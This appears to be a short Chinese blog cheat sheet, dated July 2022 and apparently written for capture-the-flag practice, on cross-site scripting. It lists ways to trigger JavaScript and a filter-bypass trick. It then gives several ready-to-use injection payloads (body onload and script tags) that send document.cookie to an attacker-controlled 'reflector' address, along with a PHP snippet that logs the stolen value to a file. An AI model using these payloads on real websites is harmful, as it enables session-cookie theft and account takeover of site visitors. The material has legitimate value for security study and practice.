写在开头可能会用到的提示

  • 执行js代码的几种方式
  • <script>代码</script>
  • <body onload="代码"></body>
  • 标签空格被过滤,可以用/**/

案例

反射性XSS

  • 思路:将JS代码插入后,如果被访问,那么就会执行JS代码,将插入的地址+cookie反射给反射机,相当于传参了
  • 反射机关键php代码,file_put_contents('./tmp/flag.txt',$_GET['shell']);
  • 注入代码(推荐):<body onload="window.location.href='你的反射机地址'+document.cookie"></body>
  • 注入代码:<script>document.location.href='你的反射机地址'+document.cookie</script>
  • 注入代码:<script>window.location.href='你的反射机地址'+document.cookie</script>
最后修改:2022 年 07 月 17 日
如果觉得我的文章对你有用,请随意赞赏